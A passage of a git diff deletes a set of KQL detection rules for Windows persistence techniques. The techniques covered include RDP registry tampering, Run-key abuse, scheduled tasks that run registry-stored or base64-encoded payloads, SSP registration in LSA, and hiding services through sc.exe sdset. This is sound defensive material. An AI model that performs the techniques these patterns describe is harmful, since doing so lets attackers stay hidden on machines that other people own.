-// Description: Detects creation of the Process Explorer drivers by processes other than Process Explorer (procexp) itself. -Hack tools or malware may use the Process Explorer driver to elevate privileges, drops it to disk for a few moments, runs a service using that driver and removes it afterwards. - -// Tags: attack.persistence, attack.privilege_escalation, attack.t1068 -DeviceFileEvents -| where (FolderPath contains "\\PROCEXP" and FolderPath endswith ".sys") and (not((InitiatingProcessFolderPath endswith "\\procexp.exe" or InitiatingProcessFolderPath endswith "\\procexp64.exe"))) \ No newline at end of file diff --git a/Persistence/Process_Monitor_Driver_Creation_By_Non-Sysinternals_Binary.kql b/Persistence/Process_Monitor_Driver_Creation_By_Non-Sysinternals_Binary.kql deleted file mode 100644 index c6201772..00000000 --- a/Persistence/Process_Monitor_Driver_Creation_By_Non-Sysinternals_Binary.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/05/05 -// Level: medium -// Description: Detects creation of the Process Monitor driver by processes other than Process Monitor (procmon) itself. -// Tags: attack.persistence, attack.privilege_escalation, attack.t1068 -DeviceFileEvents -| where (FolderPath contains "\\procmon" and FolderPath endswith ".sys") and (not((InitiatingProcessFolderPath endswith "\\procmon.exe" or InitiatingProcessFolderPath endswith "\\procmon64.exe"))) \ No newline at end of file diff --git a/Persistence/RDP_Sensitive_Settings_Changed.kql b/Persistence/RDP_Sensitive_Settings_Changed.kql deleted file mode 100644 index 7dbac35c..00000000 --- a/Persistence/RDP_Sensitive_Settings_Changed.kql +++ /dev/null @@ -1,9 +0,0 @@ -// Author: Samir Bousseaden, David ANDRE, Roberto Rodriguez @Cyb3rWard0g, Nasreddine Bencherchali -// Date: 2022/08/06 -// Level: high -// Description: Detects tampering of RDP Terminal Service/Server sensitive settings. -Such as allowing unauthorized users access to a system via the 'fAllowUnsolicited' or enabling RDP via 'fDenyTSConnections'...etc - -// Tags: attack.defense_evasion, attack.persistence, attack.t1112 -DeviceRegistryEvents -| where ((RegistryValueData in~ ("DWORD (0x00000001)", "DWORD (0x00000002)", "DWORD (0x00000003)", "DWORD (0x00000004)")) and (RegistryKey contains "\\Control\\Terminal Server" or RegistryKey contains "\\Windows NT\\Terminal Services") and RegistryKey endswith "\\Shadow") or (RegistryValueData =~ "DWORD (0x00000001)" and (RegistryKey contains "\\Control\\Terminal Server" or RegistryKey contains "\\Windows NT\\Terminal Services") and (RegistryKey endswith "\\DisableRemoteDesktopAntiAlias" or RegistryKey endswith "\\DisableSecuritySettings" or RegistryKey endswith "\\fAllowUnsolicited" or RegistryKey endswith "\\fAllowUnsolicitedFullControl")) or (RegistryKey contains "\\Control\\Terminal Server\\InitialProgram" or RegistryKey contains "\\Control\\Terminal Server\\WinStations\\RDP-Tcp\\InitialProgram" or RegistryKey contains "\\services\\TermService\\Parameters\\ServiceDll" or RegistryKey contains "\\Windows NT\\Terminal Services\\InitialProgram") \ No newline at end of file diff --git a/Persistence/RDP_Sensitive_Settings_Changed_to_Zero.kql b/Persistence/RDP_Sensitive_Settings_Changed_to_Zero.kql deleted file mode 100644 index a60a95e8..00000000 --- a/Persistence/RDP_Sensitive_Settings_Changed_to_Zero.kql +++ /dev/null @@ -1,9 +0,0 @@ -// Author: Samir Bousseaden, David ANDRE, Roberto Rodriguez @Cyb3rWard0g, Nasreddine Bencherchali -// Date: 2022/09/29 -// Level: medium -// Description: Detects tampering of RDP Terminal Service/Server sensitive settings. -Such as allowing unauthorized users access to a system via the 'fAllowUnsolicited' or enabling RDP via 'fDenyTSConnections', etc. - -// Tags: attack.defense_evasion, attack.persistence, attack.t1112 -DeviceRegistryEvents -| where RegistryValueData =~ "DWORD (0x00000000)" and (RegistryKey endswith "\\fDenyTSConnections" or RegistryKey endswith "\\fSingleSessionPerUser" or RegistryKey endswith "\\UserAuthentication") \ No newline at end of file diff --git a/Persistence/Register_New_IFiltre_For_Persistence.kql b/Persistence/Register_New_IFiltre_For_Persistence.kql deleted file mode 100644 index 0a90454d..00000000 --- a/Persistence/Register_New_IFiltre_For_Persistence.kql +++ /dev/null @@ -1,9 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/07/21 -// Level: medium -// Description: Detects when an attacker registers a new IFilter for an extension. Microsoft Windows Search uses filters to extract the content of items for inclusion in a full-text index. -You can extend Windows Search to index new or proprietary file types by writing filters to extract the content, and property handlers to extract the properties of files. - -// Tags: attack.persistence -DeviceRegistryEvents -| where ((RegistryKey contains "\\SOFTWARE\\Classes\\CLSID" and RegistryKey contains "\\PersistentAddinsRegistered\\{89BCB740-6119-101A-BCB7-00DD010655AF}") or (RegistryKey contains "\\SOFTWARE\\Classes\\." and RegistryKey contains "\\PersistentHandler")) and (not(((RegistryKey contains "\\CLSID\\{4F46F75F-199F-4C63-8B7D-86D48FE7970C}" or RegistryKey contains "\\CLSID\\{4887767F-7ADC-4983-B576-88FB643D6F79}" or RegistryKey contains "\\CLSID\\{D3B41FA1-01E3-49AF-AA25-1D0D824275AE}" or RegistryKey contains "\\CLSID\\{72773E1A-B711-4d8d-81FA-B9A43B0650DD}" or RegistryKey contains "\\CLSID\\{098f2470-bae0-11cd-b579-08002b30bfeb}" or RegistryKey contains "\\CLSID\\{1AA9BF05-9A97-48c1-BA28-D9DCE795E93C}" or RegistryKey contains "\\CLSID\\{2e2294a9-50d7-4fe7-a09f-e6492e185884}" or RegistryKey contains "\\CLSID\\{34CEAC8D-CBC0-4f77-B7B1-8A60CB6DA0F7}" or RegistryKey contains "\\CLSID\\{3B224B11-9363-407e-850F-C9E1FFACD8FB}" or RegistryKey contains "\\CLSID\\{3DDEB7A4-8ABF-4D82-B9EE-E1F4552E95BE}" or RegistryKey contains "\\CLSID\\{5645C8C1-E277-11CF-8FDA-00AA00A14F93}" or RegistryKey contains "\\CLSID\\{5645C8C4-E277-11CF-8FDA-00AA00A14F93}" or RegistryKey contains "\\CLSID\\{58A9EBF6-5755-4554-A67E-A2467AD1447B}" or RegistryKey contains "\\CLSID\\{5e941d80-bf96-11cd-b579-08002b30bfeb}" or RegistryKey contains "\\CLSID\\{698A4FFC-63A3-4E70-8F00-376AD29363FB}" or RegistryKey contains "\\CLSID\\{7E9D8D44-6926-426F-AA2B-217A819A5CCE}" or RegistryKey contains "\\CLSID\\{8CD34779-9F10-4f9b-ADFB-B3FAEABDAB5A}" or RegistryKey contains "\\CLSID\\{9694E38A-E081-46ac-99A0-8743C909ACB6}" or RegistryKey contains "\\CLSID\\{98de59a0-d175-11cd-a7bd-00006b827d94}" or RegistryKey contains "\\CLSID\\{AA10385A-F5AA-4EFF-B3DF-71B701E25E18}" or RegistryKey contains "\\CLSID\\{B4132098-7A03-423D-9463-163CB07C151F}" or RegistryKey contains "\\CLSID\\{d044309b-5da6-4633-b085-4ed02522e5a5}" or RegistryKey contains "\\CLSID\\{D169C14A-5148-4322-92C8-754FC9D018D8}" or RegistryKey contains "\\CLSID\\{DD75716E-B42E-4978-BB60-1497B92E30C4}" or RegistryKey contains "\\CLSID\\{E2F83EED-62DE-4A9F-9CD0-A1D40DCD13B6}" or RegistryKey contains "\\CLSID\\{E772CEB3-E203-4828-ADF1-765713D981B8}" or RegistryKey contains "\\CLSID\\{eec97550-47a9-11cf-b952-00aa0051fe20}" or RegistryKey contains "\\CLSID\\{FB10BD80-A331-4e9e-9EB7-00279903AD99}") or (InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\")))) \ No newline at end of file diff --git a/Persistence/Registry_Modification_to_Hidden_File_Extension.kql b/Persistence/Registry_Modification_to_Hidden_File_Extension.kql deleted file mode 100644 index 3332821a..00000000 --- a/Persistence/Registry_Modification_to_Hidden_File_Extension.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2022/01/22 -// Level: medium -// Description: Hides the file extension through modification of the registry -// Tags: attack.persistence, attack.t1137 -DeviceRegistryEvents -| where (RegistryValueData =~ "DWORD (0x00000002)" and RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Hidden") or (RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\HideFileExt") \ No newline at end of file diff --git a/Persistence/Registry_Persistence_via_Explorer_Run_Key.kql b/Persistence/Registry_Persistence_via_Explorer_Run_Key.kql deleted file mode 100644 index 6bb67120..00000000 --- a/Persistence/Registry_Persistence_via_Explorer_Run_Key.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems), oscd.community -// Date: 2018/07/18 -// Level: high -// Description: Detects a possible persistence mechanism using RUN key for Windows Explorer and pointing to a suspicious folder -// Tags: attack.persistence, attack.t1547.001 -DeviceRegistryEvents -| where (RegistryValueData contains ":\\$Recycle.bin\\" or RegistryValueData contains ":\\ProgramData\\" or RegistryValueData contains ":\\Temp\\" or RegistryValueData contains ":\\Users\\Default\\" or RegistryValueData contains ":\\Users\\Public\\" or RegistryValueData contains ":\\Windows\\Temp\\" or RegistryValueData contains "\\AppData\\Local\\Temp\\") and RegistryKey endswith "\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run" \ No newline at end of file diff --git a/Persistence/Rundll32_Registered_COM_Objects.kql b/Persistence/Rundll32_Registered_COM_Objects.kql deleted file mode 100644 index 314c9c8a..00000000 --- a/Persistence/Rundll32_Registered_COM_Objects.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2022/02/13 -// Level: high -// Description: load malicious registered COM objects -// Tags: attack.privilege_escalation, attack.persistence, attack.t1546.015 -DeviceProcessEvents -| where ((ProcessCommandLine contains "-sta " or ProcessCommandLine contains "-localserver ") and (ProcessCommandLine contains "{" and ProcessCommandLine contains "}")) and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE") \ No newline at end of file diff --git a/Persistence/Running_Chrome_VPN_Extensions_via_the_Registry_2_VPN_Extension.kql b/Persistence/Running_Chrome_VPN_Extensions_via_the_Registry_2_VPN_Extension.kql deleted file mode 100644 index dc47093d..00000000 --- a/Persistence/Running_Chrome_VPN_Extensions_via_the_Registry_2_VPN_Extension.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2021/12/28 -// Level: high -// Description: Running Chrome VPN Extensions via the Registry install 2 vpn extension -// Tags: attack.persistence, attack.t1133 -DeviceRegistryEvents -| where (RegistryKey contains "Software\\Wow6432Node\\Google\\Chrome\\Extensions" and RegistryKey endswith "update_url") and (RegistryKey contains "fdcgdnkidjaadafnichfpabhfomcebme" or RegistryKey contains "fcfhplploccackoneaefokcmbjfbkenj" or RegistryKey contains "bihmplhobchoageeokmgbdihknkjbknd" or RegistryKey contains "gkojfkhlekighikafcpjkiklfbnlmeio" or RegistryKey contains "jajilbjjinjmgcibalaakngmkilboobh" or RegistryKey contains "gjknjjomckknofjidppipffbpoekiipm" or RegistryKey contains "nabbmpekekjknlbkgpodfndbodhijjem" or RegistryKey contains "kpiecbcckbofpmkkkdibbllpinceiihk" or RegistryKey contains "nlbejmccbhkncgokjcmghpfloaajcffj" or RegistryKey contains "omghfjlpggmjjaagoclmmobgdodcjboh" or RegistryKey contains "bibjcjfmgapbfoljiojpipaooddpkpai" or RegistryKey contains "mpcaainmfjjigeicjnlkdfajbioopjko" or RegistryKey contains "jljopmgdobloagejpohpldgkiellmfnc" or RegistryKey contains "lochiccbgeohimldjooaakjllnafhaid" or RegistryKey contains "nhnfcgpcbfclhfafjlooihdfghaeinfc" or RegistryKey contains "ookhnhpkphagefgdiemllfajmkdkcaim" or RegistryKey contains "namfblliamklmeodpcelkokjbffgmeoo" or RegistryKey contains "nbcojefnccbanplpoffopkoepjmhgdgh" or RegistryKey contains "majdfhpaihoncoakbjgbdhglocklcgno" or RegistryKey contains "lnfdmdhmfbimhhpaeocncdlhiodoblbd" or RegistryKey contains "eppiocemhmnlbhjplcgkofciiegomcon" or RegistryKey contains "cocfojppfigjeefejbpfmedgjbpchcng" or RegistryKey contains "foiopecknacmiihiocgdjgbjokkpkohc" or RegistryKey contains "hhdobjgopfphlmjbmnpglhfcgppchgje" or RegistryKey contains "jgbaghohigdbgbolncodkdlpenhcmcge" or RegistryKey contains "inligpkjkhbpifecbdjhmdpcfhnlelja" or RegistryKey contains "higioemojdadgdbhbbbkfbebbdlfjbip" or RegistryKey contains "hipncndjamdcmphkgngojegjblibadbe" or RegistryKey contains "iolonopooapdagdemdoaihahlfkncfgg" or RegistryKey contains "nhfjkakglbnnpkpldhjmpmmfefifedcj" or RegistryKey contains "jpgljfpmoofbmlieejglhonfofmahini" or RegistryKey contains "fgddmllnllkalaagkghckoinaemmogpe" or RegistryKey contains "ejkaocphofnobjdedneohbbiilggdlbi" or RegistryKey contains "keodbianoliadkoelloecbhllnpiocoi" or RegistryKey contains "hoapmlpnmpaehilehggglehfdlnoegck" or RegistryKey contains "poeojclicodamonabcabmapamjkkmnnk" or RegistryKey contains "dfkdflfgjdajbhocmfjolpjbebdkcjog" or RegistryKey contains "kcdahmgmaagjhocpipbodaokikjkampi" or RegistryKey contains "klnkiajpmpkkkgpgbogmcgfjhdoljacg" or RegistryKey contains "lneaocagcijjdpkcabeanfpdbmapcjjg" or RegistryKey contains "pgfpignfckbloagkfnamnolkeaecfgfh" or RegistryKey contains "jplnlifepflhkbkgonidnobkakhmpnmh" or RegistryKey contains "jliodmnojccaloajphkingdnpljdhdok" or RegistryKey contains "hnmpcagpplmpfojmgmnngilcnanddlhb" or RegistryKey contains "ffbkglfijbcbgblgflchnbphjdllaogb" or RegistryKey contains "kcndmbbelllkmioekdagahekgimemejo" or RegistryKey contains "jdgilggpfmjpbodmhndmhojklgfdlhob" or RegistryKey contains "bihhflimonbpcfagfadcnbbdngpopnjb" or RegistryKey contains "ppajinakbfocjfnijggfndbdmjggcmde" or RegistryKey contains "oofgbpoabipfcfjapgnbbjjaenockbdp" or RegistryKey contains "bhnhkdgoefpmekcgnccpnhjfdgicfebm" or RegistryKey contains "knmmpciebaoojcpjjoeonlcjacjopcpf" or RegistryKey contains "dhadilbmmjiooceioladdphemaliiobo" or RegistryKey contains "jedieiamjmoflcknjdjhpieklepfglin" or RegistryKey contains "mhngpdlhojliikfknhfaglpnddniijfh" or RegistryKey contains "omdakjcmkglenbhjadbccaookpfjihpa" or RegistryKey contains "npgimkapccfidfkfoklhpkgmhgfejhbj" or RegistryKey contains "akeehkgglkmpapdnanoochpfmeghfdln" or RegistryKey contains "gbmdmipapolaohpinhblmcnpmmlgfgje" or RegistryKey contains "aigmfoeogfnljhnofglledbhhfegannp" or RegistryKey contains "cgojmfochfikphincbhokimmmjenhhgk" or RegistryKey contains "ficajfeojakddincjafebjmfiefcmanc" or RegistryKey contains "ifnaibldjfdmaipaddffmgcmekjhiloa" or RegistryKey contains "jbnmpdkcfkochpanomnkhnafobppmccn" or RegistryKey contains "apcfdffemoinopelidncddjbhkiblecc" or RegistryKey contains "mjolnodfokkkaichkcjipfgblbfgojpa" or RegistryKey contains "oifjbnnafapeiknapihcmpeodaeblbkn" or RegistryKey contains "plpmggfglncceinmilojdkiijhmajkjh" or RegistryKey contains "mjnbclmflcpookeapghfhapeffmpodij" or RegistryKey contains "bblcccknbdbplgmdjnnikffefhdlobhp" or RegistryKey contains "aojlhgbkmkahabcmcpifbolnoichfeep" or RegistryKey contains "lcmammnjlbmlbcaniggmlejfjpjagiia" or RegistryKey contains "knajdeaocbpmfghhmijicidfcmdgbdpm" or RegistryKey contains "bdlcnpceagnkjnjlbbbcepohejbheilk" or RegistryKey contains "edknjdjielmpdlnllkdmaghlbpnmjmgb" or RegistryKey contains "eidnihaadmmancegllknfbliaijfmkgo" or RegistryKey contains "ckiahbcmlmkpfiijecbpflfahoimklke" or RegistryKey contains "macdlemfnignjhclfcfichcdhiomgjjb" or RegistryKey contains "chioafkonnhbpajpengbalkececleldf" or RegistryKey contains "amnoibeflfphhplmckdbiajkjaoomgnj" or RegistryKey contains "llbhddikeonkpbhpncnhialfbpnilcnc" or RegistryKey contains "pcienlhnoficegnepejpfiklggkioccm" or RegistryKey contains "iocnglnmfkgfedpcemdflhkchokkfeii" or RegistryKey contains "igahhbkcppaollcjeaaoapkijbnphfhb" or RegistryKey contains "njpmifchgidinihmijhcfpbdmglecdlb" or RegistryKey contains "ggackgngljinccllcmbgnpgpllcjepgc" or RegistryKey contains "kchocjcihdgkoplngjemhpplmmloanja" or RegistryKey contains "bnijmipndnicefcdbhgcjoognndbgkep" or RegistryKey contains "lklekjodgannjcccdlbicoamibgbdnmi" or RegistryKey contains "dbdbnchagbkhknegmhgikkleoogjcfge" or RegistryKey contains "egblhcjfjmbjajhjhpmnlekffgaemgfh" or RegistryKey contains "ehbhfpfdkmhcpaehaooegfdflljcnfec" or RegistryKey contains "bkkgdjpomdnfemhhkalfkogckjdkcjkg" or RegistryKey contains "almalgbpmcfpdaopimbdchdliminoign" or RegistryKey contains "akkbkhnikoeojlhiiomohpdnkhbkhieh" or RegistryKey contains "gbfgfbopcfokdpkdigfmoeaajfmpkbnh" or RegistryKey contains "bniikohfmajhdcffljgfeiklcbgffppl" or RegistryKey contains "lejgfmmlngaigdmmikblappdafcmkndb" or RegistryKey contains "ffhhkmlgedgcliajaedapkdfigdobcif" or RegistryKey contains "gcknhkkoolaabfmlnjonogaaifnjlfnp" or RegistryKey contains "pooljnboifbodgifngpppfklhifechoe" or RegistryKey contains "fjoaledfpmneenckfbpdfhkmimnjocfa" or RegistryKey contains "aakchaleigkohafkfjfjbblobjifikek" or RegistryKey contains "dpplabbmogkhghncfbfdeeokoefdjegm" or RegistryKey contains "padekgcemlokbadohgkifijomclgjgif" or RegistryKey contains "bfidboloedlamgdmenmlbipfnccokknp") \ No newline at end of file diff --git a/Persistence/Scheduled_TaskCache_Change_by_Uncommon_Program.kql b/Persistence/Scheduled_TaskCache_Change_by_Uncommon_Program.kql deleted file mode 100644 index 5d08fc53..00000000 --- a/Persistence/Scheduled_TaskCache_Change_by_Uncommon_Program.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Syed Hasan (@syedhasan009) -// Date: 2021/06/18 -// Level: high -// Description: Monitor the creation of a new key under 'TaskCache' when a new scheduled task is registered by a process that is not svchost.exe, which is suspicious -// Tags: attack.persistence, attack.t1053, attack.t1053.005 -DeviceRegistryEvents -| where RegistryKey contains "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache" and (not(((RegistryKey contains "Microsoft\\Windows\\UpdateOrchestrator" or RegistryKey contains "Microsoft\\Windows\\SoftwareProtectionPlatform\\SvcRestartTask\\Index" or RegistryKey contains "Microsoft\\Windows\\Flighting\\OneSettings\\RefreshCache\\Index") or (InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Dropbox\\Update\\DropboxUpdate.exe", "C:\\Program Files\\Dropbox\\Update\\DropboxUpdate.exe")) or (InitiatingProcessFolderPath =~ "C:\\Windows\\explorer.exe" and RegistryKey contains "\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree\\Microsoft\\Windows\\PLA\\Server Manager Performance Monitor") or InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\msiexec.exe" or (InitiatingProcessFolderPath endswith "\\ngen.exe" and InitiatingProcessFolderPath startswith "C:\\Windows\\Microsoft.NET\\Framework" and (RegistryKey contains "\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\{B66B135D-DA06-4FC4-95F8-7458E1D10129}" or RegistryKey contains "\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree\\Microsoft\\Windows\\.NET Framework\\.NET Framework NGEN")) or (InitiatingProcessFolderPath in~ ("C:\\Program Files\\Microsoft Office\\root\\Integration\\Integrator.exe", "C:\\Program Files (x86)\\Microsoft Office\\root\\Integration\\Integrator.exe")) or InitiatingProcessFolderPath =~ "C:\\WINDOWS\\system32\\svchost.exe" or InitiatingProcessFolderPath =~ "System" or (InitiatingProcessFolderPath endswith "\\TiWorker.exe" and InitiatingProcessFolderPath startswith "C:\\Windows\\")))) \ No newline at end of file diff --git a/Persistence/Scheduled_Task_Creation_Via_Schtasks.EXE.kql b/Persistence/Scheduled_Task_Creation_Via_Schtasks.EXE.kql deleted file mode 100644 index 0ea2e752..00000000 --- a/Persistence/Scheduled_Task_Creation_Via_Schtasks.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2019/01/16 -// Level: low -// Description: Detects the creation of scheduled tasks by user accounts via the "schtasks" utility. -// Tags: attack.execution, attack.persistence, attack.privilege_escalation, attack.t1053.005, attack.s0111, car.2013-08-001, stp.1u -DeviceProcessEvents -| where (ProcessCommandLine contains " /create " and FolderPath endswith "\\schtasks.exe") and (not((AccountName contains "AUTHORI" or AccountName contains "AUTORI"))) \ No newline at end of file diff --git a/Persistence/Scheduled_Task_Executing_Encoded_Payload_from_Registry.kql b/Persistence/Scheduled_Task_Executing_Encoded_Payload_from_Registry.kql deleted file mode 100644 index 3d746a96..00000000 --- a/Persistence/Scheduled_Task_Executing_Encoded_Payload_from_Registry.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: pH-T (Nextron Systems), @Kostastsale, @TheDFIRReport, X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/02/12 -// Level: high -// Description: Detects the creation of a schtask that potentially executes a base64 encoded payload stored in the Windows Registry using PowerShell. -// Tags: attack.execution, attack.persistence, attack.t1053.005, attack.t1059.001 -DeviceProcessEvents -| where ProcessCommandLine contains "/Create" and (ProcessCommandLine contains "FromBase64String" or ProcessCommandLine contains "encodedcommand") and (ProcessCommandLine contains "Get-ItemProperty" or ProcessCommandLine contains " gp ") and (ProcessCommandLine contains "HKCU:" or ProcessCommandLine contains "HKLM:" or ProcessCommandLine contains "registry::" or ProcessCommandLine contains "HKEY_") and (FolderPath endswith "\\schtasks.exe" or ProcessVersionInfoOriginalFileName =~ "schtasks.exe") \ No newline at end of file diff --git a/Persistence/Scheduled_Task_Executing_Payload_from_Registry.kql b/Persistence/Scheduled_Task_Executing_Payload_from_Registry.kql deleted file mode 100644 index 0e49c7fb..00000000 --- a/Persistence/Scheduled_Task_Executing_Payload_from_Registry.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/07/18 -// Level: medium -// Description: Detects the creation of a schtasks that potentially executes a payload stored in the Windows Registry using PowerShell. -// Tags: attack.execution, attack.persistence, attack.t1053.005, attack.t1059.001 -DeviceProcessEvents -| where (ProcessCommandLine contains "/Create" and (ProcessCommandLine contains "Get-ItemProperty" or ProcessCommandLine contains " gp ") and (ProcessCommandLine contains "HKCU:" or ProcessCommandLine contains "HKLM:" or ProcessCommandLine contains "registry::" or ProcessCommandLine contains "HKEY_") and (FolderPath endswith "\\schtasks.exe" or ProcessVersionInfoOriginalFileName =~ "schtasks.exe")) and (not((ProcessCommandLine contains "FromBase64String" or ProcessCommandLine contains "encodedcommand"))) \ No newline at end of file diff --git a/Persistence/Schtasks_Creation_Or_Modification_With_SYSTEM_Privileges.kql b/Persistence/Schtasks_Creation_Or_Modification_With_SYSTEM_Privileges.kql deleted file mode 100644 index c68909e4..00000000 --- a/Persistence/Schtasks_Creation_Or_Modification_With_SYSTEM_Privileges.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/07/28 -// Level: high -// Description: Detects the creation or update of a scheduled task to run with "NT AUTHORITY\SYSTEM" privileges -// Tags: attack.execution, attack.persistence, attack.t1053.005 -DeviceProcessEvents -| where (((ProcessCommandLine contains " /change " or ProcessCommandLine contains " /create ") and FolderPath endswith "\\schtasks.exe") and ProcessCommandLine contains "/ru " and (ProcessCommandLine contains "NT AUT" or ProcessCommandLine contains " SYSTEM ")) and (not(((ProcessCommandLine contains "/Create /F /RU System /SC WEEKLY /TN AviraSystemSpeedupVerify /TR " or ProcessCommandLine contains ":\\Program Files (x86)\\Avira\\System Speedup\\setup\\avira_speedup_setup.exe" or ProcessCommandLine contains "/VERIFY /VERYSILENT /NOSTART /NODOTNET /NORESTART\" /RL HIGHEST") or ((ProcessCommandLine contains "/TN TVInstallRestore" and ProcessCommandLine contains "\\TeamViewer_.exe") and FolderPath endswith "\\schtasks.exe")))) \ No newline at end of file diff --git a/Persistence/Security_Support_Provider_(SSP)_Added_to_LSA_Configuration.kql b/Persistence/Security_Support_Provider_(SSP)_Added_to_LSA_Configuration.kql deleted file mode 100644 index 7d8944ed..00000000 --- a/Persistence/Security_Support_Provider_(SSP)_Added_to_LSA_Configuration.kql +++ /dev/null @@ -1,8 +0,0 @@ -// Author: iwillkeepwatch -// Date: 2019/01/18 -// Level: high -// Description: Detects the addition of a SSP to the registry. Upon a reboot or API call, SSP DLLs gain access to encrypted and plaintext passwords stored in Windows. - -// Tags: attack.persistence, attack.t1547.005 -DeviceRegistryEvents -| where (RegistryKey endswith "\\Control\\Lsa\\Security Packages" or RegistryKey endswith "\\Control\\Lsa\\OSConfig\\Security Packages") and (not((InitiatingProcessFolderPath in~ ("C:\\Windows\\system32\\msiexec.exe", "C:\\Windows\\syswow64\\MsiExec.exe")))) \ No newline at end of file diff --git a/Persistence/ServiceDll_Hijack.kql b/Persistence/ServiceDll_Hijack.kql deleted file mode 100644 index fb9f8be0..00000000 --- a/Persistence/ServiceDll_Hijack.kql +++ /dev/null @@ -1,9 +0,0 @@ -// Author: frack113 -// Date: 2022/02/04 -// Level: medium -// Description: Detects changes to the "ServiceDLL" value related to a service in the registry. -This is often used as a method of persistence. - -// Tags: attack.persistence, attack.privilege_escalation, attack.t1543.003 -DeviceRegistryEvents -| where ((RegistryKey contains "\\System" and RegistryKey contains "ControlSet" and RegistryKey contains "\\Services") and RegistryKey endswith "\\Parameters\\ServiceDll") and (not(((RegistryValueData =~ "%%systemroot%%\\system32\\ntdsa.dll" and InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\lsass.exe" and RegistryKey endswith "\\Services\\NTDS\\Parameters\\ServiceDll") or InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\poqexec.exe" or RegistryValueData =~ "C:\\Windows\\system32\\spool\\drivers\\x64\\3\\PrintConfig.dll"))) and (not((RegistryValueData =~ "C:\\Windows\\System32\\STAgent.dll" and InitiatingProcessFolderPath endswith "\\regsvr32.exe"))) \ No newline at end of file diff --git a/Persistence/Service_DACL_Abuse_To_Hide_Services_Via_Sc.EXE.kql b/Persistence/Service_DACL_Abuse_To_Hide_Services_Via_Sc.EXE.kql deleted file mode 100644 index 04c45340..00000000 --- a/Persistence/Service_DACL_Abuse_To_Hide_Services_Via_Sc.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Andreas Hunkeler (@Karneades) -// Date: 2021/12/20 -// Level: high -// Description: Detects usage of the "sc.exe" utility adding a new service with special permission seen used by threat actors which makes the service hidden and unremovable. -// Tags: attack.persistence, attack.defense_evasion, attack.privilege_escalation, attack.t1574.011 -DeviceProcessEvents -| where (ProcessCommandLine contains "sdset" and ProcessCommandLine contains "DCLCWPDTSD") and (FolderPath endswith "\\sc.exe" or ProcessVersionInfoOriginalFileName =~ "sc.exe") \ No newline at end of file diff --git a/Persistence/Service_Security_Descriptor_Tampering_Via_Sc.EXE.kql b/Persistence/Service_Security_Descriptor_Tampering_Via_Sc.EXE.kql deleted file mode 100644 index a2adcfc1..00000000 --- a/Persistence/Service_Security_Descriptor_Tampering_Via_Sc.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/02/28 -// Level: medium -// Description: Detection of sc.exe utility adding a new service with special permission which hides that service. -// Tags: attack.persistence, attack.defense_evasion, attack.privilege_escalation, attack.t1574.011 -DeviceProcessEvents -| where ProcessCommandLine contains "sdset" and (FolderPath endswith "\\sc.exe" or ProcessVersionInfoOriginalFileName =~ "sc.exe") \ No newline at end of file diff --git a/Persistence/Session_Manager_Autorun_Keys_Modification.kql b/Persistence/Session_Manager_Autorun_Keys_Modification.kql deleted file mode 100644 index d2a2b737..00000000 --- a/Persistence/Session_Manager_Autorun_Keys_Modification.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) -// Date: 2019/10/25 -// Level: medium -// Description: Detects modification of autostart extensibility point (ASEP) in registry. -// Tags: attack.persistence, attack.t1547.001, attack.t1546.009 -DeviceRegistryEvents -| where RegistryKey contains "\\System\\CurrentControlSet\\Control\\Session Manager" and (RegistryKey contains "\\SetupExecute" or RegistryKey contains "\\S0InitialCommand" or RegistryKey contains "\\KnownDlls" or RegistryKey contains "\\Execute" or RegistryKey contains "\\BootExecute" or RegistryKey contains "\\AppCertDlls") and (not(RegistryValueData =~ "(Empty)")) \ No newline at end of file diff --git a/Persistence/Shell_Process_Spawned_by_Java.EXE.kql b/Persistence/Shell_Process_Spawned_by_Java.EXE.kql deleted file mode 100644 index 534b99c8..00000000 --- a/Persistence/Shell_Process_Spawned_by_Java.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Andreas Hunkeler (@Karneades), Nasreddine Bencherchali -// Date: 2021/12/17 -// Level: medium -// Description: Detects shell spawned from Java host process, which could be a sign of exploitation (e.g. log4j exploitation) -// Tags: attack.initial_access, 